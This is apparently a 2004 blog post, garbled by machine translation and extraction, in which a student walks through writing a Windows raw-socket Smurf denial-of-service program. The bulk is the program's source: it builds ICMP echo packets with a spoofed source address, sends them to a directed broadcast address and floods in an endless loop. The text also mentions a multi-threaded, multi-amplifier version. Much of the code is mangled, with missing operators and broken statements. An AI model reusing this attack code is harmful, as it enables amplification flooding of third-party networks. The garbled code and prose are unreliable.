I finally got this written. It took me longer than anything I have done so far: I ran into a lot of problems and read a lot of other programs along the way. The 10004 error I kept getting seems to have been because the IP header was not filled in properly. The IP header layout is essentially standard, but I could not find definitions of the various protocol headers in the Windows header files, which was frustrating.
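// On-the-wire header layouts for building or parsing an ICMP packet by hand.
// Multi-byte fields hold the bytes exactly as they appear in the packet, so
// values must be converted with htons()/htonl() before they are stored.
// Neither struct is explicitly packed; the layouts rely on every field
// already sitting on its natural alignment.

// ICMP header: type, code, checksum, identifier, sequence number, timestamp.
// unsigned short / unsigned long are what the Windows USHORT / ULONG typedefs
// expand to. NOTE(review): unsigned long is 32 bits on Windows, which this
// listing targets; on LP64 platforms it is 64 bits and the struct would no
// longer match a 12-byte layout.
typedef struct _icmp_header {
    unsigned char  type;       // ICMP message type (raw byte, so unsigned)
    unsigned char  code;       // ICMP message code
    unsigned short checksum;   // checksum over the ICMP header and its data
    unsigned short id;         // identifier
    unsigned short sequence;   // sequence number
    unsigned long  timestamp;  // timestamp
} ICMP_HEADER;

// IPv4 header without options: 20 bytes.
typedef struct _ip_header {
    unsigned char  ip_verlen;       // 4-bit IPv4 version, then 4-bit header length (in 32-bit words)
    unsigned char  ip_tos;          // IP type of service
    unsigned short ip_totallength;  // Total length
    unsigned short ip_id;           // Unique identifier
    unsigned short ip_offset;       // Fragment offset field
    unsigned char  ip_ttl;          // Time to live
    unsigned char  ip_protocol;     // Protocol (TCP, UDP etc)
    unsigned short ip_checksum;     // IP checksum
    unsigned int   ip_srcaddr;      // Source address
    unsigned int   ip_destaddr;     // Destination address
} IP_HEADER;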
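In addition, setsockopt is called with the IP_HDRINCL option, which needs one more header file: #include (the header name was lost when this page was extracted; in the Windows SDK, IP_HDRINCL is declared through ws2tcpip.h).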
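// Computes the 16-bit one's-complement Internet checksum (the RFC 1071
// algorithm) over `size` bytes starting at `buffer`.
//
// buffer: start of the data. It is read as native 16-bit words, so it should
//         be 2-byte aligned. The checksum field inside the data has to be
//         zero while the sum is taken.
// size:   number of bytes to cover. Zero or a negative value covers nothing
//         and yields 0xFFFF.
// Returns the complemented sum. Because the words were read in host order,
// the result is stored into the header as-is, without htons().
// (unsigned short is what the Windows USHORT typedef expands to.)
unsigned short checksum(unsigned short *buffer, int size)
{
    unsigned long cksum = 0;

    // Add up the data one 16-bit word at a time.
    while (size > 1) {
        cksum += *buffer++;
        size -= (int)sizeof(unsigned short);
    }

    // Odd length: the final byte counts as a word padded with a zero byte.
    // Writing it into the first byte of a zeroed word keeps the result
    // correct on both little- and big-endian hosts.
    if (size == 1) {
        unsigned short last = 0;
        *(unsigned char *)&last = *(unsigned char *)buffer;
        cksum += last;
    }

    // Fold the carries above bit 15 back into the low 16 bits; the second
    // step absorbs the carry the first fold can produce.
    cksum = (cksum >> 16) + (cksum & 0xFFFF);
    cksum += (cksum >> 16);

    return (unsigned short)~cksum;
}
// This routine is used in many places.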
There is also a key place to fill in checksum, IP head is like the computer is automatically given, is this? When you fill it, you must pay attention to checksum first, then you go to a buff , Then then calculate it once with Checksum, fill in, and then re-put the ICMP head in the buff, and ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, Fill in the IP head, and wait until the end ?? It is estimated to be filled with the computer / when the ICMP head is not filled, ICMP's checksum is always an error ????? Memcpy (buff, & ip_header, sizeof (ip_header)); memcpy (Buff sizeof (IP_HEADER), & icmp_heAder, (sizeof (ICMP_HEADER) 20)); // 20 memset (Buff sizeof (IP_HEADER) sizeof (ICMP_HEADER), 'A', 20); ip_heAder.ip_checksum = checksum ((USHORT *) BUFF, SIZEOF (BUFF)); ICMP_HEADER.CHECKSUM = Checksum ((Ushort *) (Buff SizeOf (IP_HEADER)), (Sizeof (ICMP_HEADER) 20);
memcpy (Buff, & ip_heAder, sizeof (IP_HEADER)); memcpy (Buff sizeof (IP_HEADER), & icmp_heAder, (sizeof (ICMP_HEADER) 20)); // 20 memset (Buff sizeof (IP_HEADER) sizeof (ICMP_HEADER), 'A', 20);
While I was working on this, my Windows 2000 machine blue-screened many times; filling in the broadcast address is what triggers the blue screen. I sent the program that causes the blue screen, unmodified, as an attachment to Ms-foCus@security.org, but I have not seen it appear on the mailing list. It also happened once when I used malloc. Sigh.
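The following is a Smurf program, but the attack is not very strong: its effect depends entirely on the machines in the amplifier network. That dependence is also where the defence lies: a network whose routers do not forward directed broadcasts (RFC 2644) cannot act as an amplifier, and source-address ingress filtering (BCP 38) keeps the spoofed requests from leaving the sender's network. I later changed it into a "smurfattack" version with multiple threads and multiple amplifiers.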
#include "stdio.h" #include "winsock2.h" #include
Typedef struct _icmp_header {char Type; char code; ushort checksum; ushort id; ushort sequence; ulong timestamp;} ICMP_HEADER; / / ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------- typedef struct _ip_header {unsigned char ip_verlen; // 4-bit IPv4 version // 4-bit header length (in 32-bit words) unsigned char ip_tos; // IP type of service unsigned short ip_totallength; // Total length unsigned short ip_id; // Unique identifier unsigned short ip_offset; // Fragment offset field unsigned char ip_ttl; // Time to live unsigned char ip_protocol; // Protocol (TCP, UDP etc) unsigned short ip_checksum; // IP checksum unsigned int ip_srcaddr; // Source address unsigned int ip_destaddr ; // Source Address} ip_header; // ------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------- Ushort Checksum (Ushort * Buffer, Int size) {Unsigned Long CKSU M = 0; while (size> 1) {cksum = * buffer ; size - = sizeof (ushort);} if (size) {cksum = * (uchar *) buffer;} cksum = (CKSUM >> 16) (CKSUM & 0xFFF); CKSUM = (CKSUM >> 16); return (~ cksum);} // ---------------------- -------------------------------------------- Int main (int argc, char * Argv []) {WSADATA WSADAtA; SOCKET RAwSock; int TimeOut; BOOL HAdHeAder; BOOL IsBrocAst; IP_HEADER ip_heAder; ICMP_HEADER icmp_heAder; char Buff [sizeof (IP_HEADER) sizeof (ICMP_HEADER) 20];
Struct SockAddr_in Saddr = {0}, Daddr = {0};
IF (WSAStartup ("WsaStartup Failed:% D / N", getLastError ()); return -1;} if ((Rawsock = Socket (AF_INET, SOCKET (AF_INET, SOCK_RAW, 255) ) == invalid_socket) {Printf ("socket failed:% D / N", getLastError ()); return -1;} timeout = 500; IF (setsockopt (Rawsock, SOL_Socket, So_SndTimeo, (char *) & Timeout, Sizeof Timeout))) {Printf ("SetsockOpt Sendtimeout Failed:% D / N", getLastError ()); return -1;} if (setsockopt (Rawsock, Sol_Socket, SO_RCVTIMEO, (CHAR *) & Timeout, Sizeof (Timeout))) {Printf ("Setsockopt Recvtimeout Failed:% D / N", getLastError ()); Return -1;}
HAdHeAder = TRUE; if (setsockopt (RAwSock, IPPROTO_IP, IP_HDRINCL, (char *) & HAdHeAder, sizeof (HAdHeAder))) {printf ( "setsockopt IP_HDRINCL fAiled:% d / n", GetLastError ()); return -1;}
IsBrocAst = TRUE; if (setsockopt (RAwSock, SOL_SOCKET, SO_BROADCAST, (char *) & IsBrocAst, sizeof (IsBrocAst))) {printf ( "setsockopt IP_HDRINCL fAiled:% d / n", GetLastError ()); return -1;}
// buff = malloc (sizeof (ip_header) 20);
// ip_header = (ip_header *) BUFF;
/ Fill ip_heAder ip_heAder.ip_verlen = (4 << 4 | sizeof (IP_HEADER) / sizeof (unsigned long)); //ip_heAder.ihl = 5; ip_heAder.ip_tos = 0; ip_heAder.ip_totallength = htons (sizeof (IP_HEADER) sizeof (ICMP_HEADER) 20); ip_heAder.ip_id = 0; //ip_heAder.frAg_off = 0; ip_heAder.ip_offset = 0; ip_heAder.ip_ttl = 255; ip_heAder.ip_protocol = IPPROTO_ICMP; ip_heAder.ip_srcaddr = inet_addr ( "202.198.169.128 "); IP_HEADER.IP_DESTADDR = INET_ADDR (" 202.198.169.255 "); //ip_header.checksum = Checksum ((Ushort *) & ip_header, sizeof (ip_header)); ///
// icmp_heAder = (ICMP_HEADER *) (Buff sizeof (IP_HEADER)); // fill icmp_heAder icmp_heAder.type = 8; icmp_heAder.code = 0; icmp_heAder.id = htons (0); icmp_heAder.sequence = 0; // ICMP_HEADER.CHECKSUM = 0; ICMP_HEADER.CHECKSUM = 0; // Checksum ((Ushort *) (buff sizeof (ip_header)), (Sizeof (ICMP_HEADER) 20); ////
Saddr.sin_family = AF_INET; Saddr.sin_Addr .s_un .s_addr = ip_header.ip_destaddr; saddr.sin_port = htons (0);
/ When ICMP head is not filled, ICMP Checksum is always an error ????? Memcpy (buff, & ip_header, sizeof (ip_header)); Memcpy (buff sizeof (ip_header), & icmp_header, (sizeof (icmp_header) 20)); // 20 MEMSET (Buff SizeOf (IP_HEADER) SIZEOF (ICMP_HEADER), 'A', 20); IP_HEADER.IP_CHECKSUM = Checksum ((Ushort *) BUFF, SIZEOF (BUFF)); ICMP_Header.Checksum = Checksum ((Ushort *) (Buff SizeOf (IP_HEADER)), (SizeOf (ICMP_HEADER) 20);
memcpy (Buff, & ip_heAder, sizeof (IP_HEADER)); memcpy (Buff sizeof (IP_HEADER), & icmp_heAder, (sizeof (ICMP_HEADER) 20)); // 20 memset (Buff sizeof (IP_HEADER) sizeof (ICMP_HEADER), 'A', 20);
/// while (1) {// Sleep (200); if (! Sendto (Rawsock, Buff, Sizeof (BUFF), 0, (Struct SockAddr *) & Saddr, SIZEOF (SADDR))) {Printf ("Send Failed :% D / N ", getLastError ()); return -1;}} clossoSocket; wsacleanup (); return 0;}
Uty uty@mail.jlu.edu.cn 2004-10-12